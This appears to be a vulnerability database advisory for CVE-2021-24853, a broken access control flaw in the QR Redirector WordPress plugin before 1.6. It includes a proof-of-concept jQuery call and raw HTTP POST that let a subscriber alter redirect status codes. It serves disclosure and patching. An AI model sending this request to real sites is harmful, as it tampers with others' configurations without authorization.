QR Redirector < 1.6 – Subscriber+ Arbitrary QR Redirect Response Status Update | CVE 2021-24853 | Plugin Vulnerabilities

Description

The plugin does not have capability and CSRF checks when saving bulk QR Redirector settings via the qr_save_bulk AJAX action, which could allow any authenticated user, such as subscriber to change the redirect response status code of arbitrary QR Redirects

Proof of Concept

jQuery.post(ajaxurl, {
qr_redirect_response: 308,
post_ids: [830],
action: "qr_save_bulk"
})

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 64
Connection: close
Cookie: [any authenticated user]

qr_redirect_response=308&post_ids%5B%5D=830&action=qr_save_bulk

Affects Plugins

Fixed in 1.6

References

CVE

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

240bed24-0315-4bbf-ba17-e4947e5ecacb

Timeline

Publicly Published

2021-10-18 (about 4 years ago)

Added

2021-10-18 (about 4 years ago)

Last Updated

2022-04-15 (about 3 years ago)

Other

Published

Title

Published

2024-06-28

Title

Patreon WordPress < 1.9.1 - Protection Mechanism Bypass

Published

2021-09-02

Title

Meow Gallery < 4.2.0 - Unauthorised Arbitrary Options Update via REST API

Published

2025-02-18

Title

ElementsKit Elementor addons < 3.4.1 - Unauthenticated Information Exposure

Published

2021-02-10

Title

Map Block for Google Maps < 1.32 - Unauthorised Google API Key change

Published

2021-11-03

Title

Event Manager for WooCommerce < 3.5.3 - Unauthenticated Arbitrary Options Reset